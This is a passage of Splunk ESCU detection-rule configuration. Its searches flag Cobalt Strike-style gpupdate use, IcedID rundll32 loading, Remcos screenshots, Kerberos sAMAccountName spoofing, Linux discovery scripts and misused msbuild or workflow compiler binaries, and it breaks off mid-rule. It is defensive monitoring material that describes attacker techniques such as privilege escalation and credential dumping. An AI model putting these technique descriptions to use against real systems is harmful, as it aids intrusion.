`suspicious_event_log_service_behavior_filter` [ESCU - Suspicious GPUpdate no Command Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies gpupdate.exe with no command line arguments. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies gpupdate.exe with no command line arguments. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious GPUpdate no Command Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Suspicious gpupdate.exe process with no command line arguments executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious GPUpdate no Command Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies gpupdate.exe with no command line arguments. It is unusual for gpupdate.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. gpupdate.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.notable.param.rule_title = Suspicious GPUpdate no Command Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_gpupdate` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(gpupdate\.exe.{0,4}$)" | `suspicious_gpupdate_no_command_line_arguments_filter` [ESCU - Suspicious IcedID Rundll32 Cmdline - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious rundll32.exe commandline to execute dll file. This technique was seen in IcedID malware to load its payload dll with the following parameter to load encrypted dll payload which is the license.dat. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious rundll32.exe commandline to execute dll file. This technique was seen in IcedID malware to load its payload dll with the following parameter to load encrypted dll payload which is the license.dat. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = limitted. this parameter is not commonly used by windows application but can be used by the network operator. action.escu.creation_date = 2021-07-26 action.escu.modification_date = 2021-07-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious IcedID Rundll32 Cmdline - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = rundll32 process $process_name$ with commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious IcedID Rundll32 Cmdline - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious rundll32.exe commandline to execute dll file. This technique was seen in IcedID malware to load its payload dll with the following parameter to load encrypted dll payload which is the license.dat. action.notable.param.rule_title = Suspicious IcedID Rundll32 Cmdline action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*/i:* by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_icedid_rundll32_cmdline_filter` [ESCU - Suspicious Image Creation In Appdata Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious creation of image in appdata folder made by process that also has a file reference in appdata folder. This technique was seen in remcos rat that capture screenshot of the compromised machine and place it in the appdata and will be send to its C2 server. This TTP is really a good indicator to check that process because it is in suspicious folder path and image files are not commonly created by user in this folder path. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious creation of image in appdata folder made by process that also has a file reference in appdata folder. This technique was seen in remcos rat that capture screenshot of the compromised machine and place it in the appdata and will be send to its C2 server. This TTP is really a good indicator to check that process because it is in suspicious folder path and image files are not commonly created by user in this folder path. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-07-07 action.escu.modification_date = 2022-07-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Image Creation In Appdata Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos"] action.risk = 1 action.risk.param._risk_message = Process $process_name$ creating image file $file_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Image Creation In Appdata Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious creation of image in appdata folder made by process that also has a file reference in appdata folder. This technique was seen in remcos rat that capture screenshot of the compromised machine and place it in the appdata and will be send to its C2 server. This TTP is really a good indicator to check that process because it is in suspicious folder path and image files are not commonly created by user in this folder path. action.notable.param.rule_title = Suspicious Image Creation In Appdata Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=*.exe Processes.process_path="*\\appdata\\Roaming\\*" by _time span=1h Processes.process_id Processes.process_name Processes.process Processes.dest Processes.process_guid | `drop_dm_object_name(Processes)` |rename process_guid as proc_guid |join proc_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.png","*.jpg","*.bmp","*.gif","*.tiff") Filesystem.file_path= "*\\appdata\\Roaming\\*" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid | `drop_dm_object_name(Filesystem)` |rename process_guid as proc_guid | fields _time dest file_create_time file_name file_path process_name process_path process proc_guid] | `suspicious_image_creation_in_appdata_folder_filter` [ESCU - Suspicious Kerberos Service Ticket Request - Rule] action.escu = 0 action.escu.enabled = 1 description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket (TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket (TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = We have tested this detection logic with ~2 million 4769 events and did not identify false positives. However, they may be possible in certain environments. Filter as needed. action.escu.creation_date = 2021-12-20 action.escu.modification_date = 2021-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Kerberos Service Ticket Request - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = A suspicious Kerberos Service Ticket was requested by $user$ on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Kerberos Service Ticket Request - Rule action.correlationsearch.annotations = {"analytic_story": ["sAMAccountName Spoofing and Domain Controller Impersonation", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 60, "cve": ["CVE-2021-42287", "CVE-2021-42278"], "impact": 100, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = As part of the sAMAccountName Spoofing (CVE-2021-42278) and Domain Controller Impersonation (CVE-2021-42287) exploitation chain, adversaries will request and obtain a Kerberos Service Ticket (TGS) with a domain controller computer account as the Service Name. This Service Ticket can be then used to take control of the domain controller on the final part of the attack. This analytic leverages Event Id 4769, `A Kerberos service ticket was requested`, to identify an unusual TGS request where the Account_Name requesting the ticket matches the Service_Name field. This behavior could represent an exploitation attempt of CVE-2021-42278 and CVE-2021-42287 for privilege escalation. action.notable.param.rule_title = Suspicious Kerberos Service Ticket Request action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4769 | eval isSuspicious = if(lower(Service_Name) = lower(mvindex(split(Account_Name,"@"),0)+"$"),1,0) | where isSuspicious = 1 | rename ComputerName as dest| rename Account_Name as user | table _time, dest, Client_Address, Account_Name, Service_Name, Failure_Code, isSuspicious | `suspicious_kerberos_service_ticket_request_filter` [ESCU - Suspicious Linux Discovery Commands - Rule] action.escu = 0 action.escu.enabled = 1 description = This search, detects execution of suspicious bash commands from various commonly leveraged bash scripts like (AutoSUID, LinEnum, LinPeas) to perform discovery of possible paths of privilege execution, password files, vulnerable directories, executables and file permissions on a Linux host.\ The search logic specifically looks for high number of distinct commands run in a short period of time. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search, detects execution of suspicious bash commands from various commonly leveraged bash scripts like (AutoSUID, LinEnum, LinPeas) to perform discovery of possible paths of privilege execution, password files, vulnerable directories, executables and file permissions on a Linux host.\ The search logic specifically looks for high number of distinct commands run in a short period of time. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unless an administrator is using these commands to troubleshoot or audit a system, the execution of these commands should be monitored. action.escu.creation_date = 2021-12-06 action.escu.modification_date = 2021-12-06 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious Linux Discovery Commands - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Post-Exploitation"] action.risk = 1 action.risk.param._risk_message = Suspicious Linux Discovery Commands detected on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious Linux Discovery Commands - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Post-Exploitation"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search, detects execution of suspicious bash commands from various commonly leveraged bash scripts like (AutoSUID, LinEnum, LinPeas) to perform discovery of possible paths of privilege execution, password files, vulnerable directories, executables and file permissions on a Linux host.\ The search logic specifically looks for high number of distinct commands run in a short period of time. action.notable.param.rule_title = Suspicious Linux Discovery Commands action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) values(Processes.process_name) values(Processes.parent_process_name) dc(Processes.process) as distinct_commands dc(Processes.process_name) as distinct_process_names min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where [|inputlookup linux_tool_discovery_process.csv | rename process as Processes.process |table Processes.process] by _time span=5m Processes.user Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| where distinct_commands > 40 AND distinct_process_names > 3| `suspicious_linux_discovery_commands_filter` [ESCU - Suspicious microsoft workflow compiler rename - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a renamed instance of microsoft.workflow.compiler.exe. Microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. A spawned child process from microsoft.workflow.compiler.exe is uncommon. In any instance, microsoft.workflow.compiler.exe spawning from an Office product or any living off the land binary is highly suspect. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a renamed instance of microsoft.workflow.compiler.exe. Microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. A spawned child process from microsoft.workflow.compiler.exe is uncommon. In any instance, microsoft.workflow.compiler.exe spawning from an Office product or any living off the land binary is highly suspect. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications may use a moved copy of microsoft.workflow.compiler.exe, triggering a false positive. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious microsoft workflow compiler rename - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "Trusted Developer Utilities Proxy Execution", "BlackByte Ransomware", "Graceful Wipe Out Attack"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious microsoft workflow compiler rename - Rule action.correlationsearch.annotations = {"analytic_story": ["Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "Trusted Developer Utilities Proxy Execution", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=microsoft.workflow.compiler.exe AND Processes.original_file_name=Microsoft.Workflow.Compiler.exe by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.original_file_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_microsoft_workflow_compiler_rename_filter` [ESCU - Suspicious microsoft workflow compiler usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies microsoft.workflow.compiler.exe usage. microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. It is not a commonly used process by many applications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies microsoft.workflow.compiler.exe usage. microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. It is not a commonly used process by many applications. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, limited instances have been identified coming from native Microsoft utilities similar to SCCM. action.escu.creation_date = 2021-01-12 action.escu.modification_date = 2021-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious microsoft workflow compiler usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = Suspicious microsoft.workflow.compiler.exe process ran on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious microsoft workflow compiler usage - Rule action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies microsoft.workflow.compiler.exe usage. microsoft.workflow.compiler.exe is natively found in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 and is rarely utilized. When investigating, identify the executed code on disk and review. It is not a commonly used process by many applications. action.notable.param.rule_title = Suspicious microsoft workflow compiler usage action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_microsoftworkflowcompiler` by Processes.dest Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_microsoft_workflow_compiler_usage_filter` [ESCU - Suspicious msbuild path - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies msbuild.exe executing from a non-standard path. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. Instances of Visual Studio will run a copy of msbuild.exe. A moved instance of MSBuild is suspicious, however there are instances of build applications that will move or use a copy of MSBuild. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies msbuild.exe executing from a non-standard path. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. Instances of Visual Studio will run a copy of msbuild.exe. A moved instance of MSBuild is suspicious, however there are instances of build applications that will move or use a copy of MSBuild. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some legitimate applications may use a moved copy of msbuild.exe, triggering a false positive. Baselining of MSBuild.exe usage is recommended to better understand it's path usage. Visual Studio runs an instance out of a path that will need to be filtered on. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Suspicious msbuild path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = Msbuild.exe ran from an uncommon path on $dest$ execyted by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Suspicious msbuild path - Rule action.correlationsearch.annotations = {"analytic_story": ["Trusted Developer Utilities Proxy Execution MSBuild", "Masquerading - Rename System Utilities", "Living Off The Land", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies msbuild.exe executing from a non-standard path. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. Instances of Visual Studio will run a copy of msbuild.exe. A moved instance of MSBuild is suspicious, however there are instances of build applications that will move or use a copy of MSBuild. action.notable.param.rule_title = Suspicious msbuild path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_msbuild` AND (Processes.process_path!=*\\framework*\\v*\\*) by Processes.dest Processes.original_file_name Processes.parent_process Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `suspicious_msbuild_path_filter` [ESCU - Suspicious MSBuild Rename - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies renamed instances of msbuild.exe executing. Msbuild.exe is natively found in C:\Windows\Microsoft.NET\Framework\v4.0.30319 and C:\Windows\Microsoft.NET\Framework64\v4.0.30319. During investigation, identify the code executed and what is executing a renamed instance of MSBuild. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1127", "T1036.003", "T1127.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic 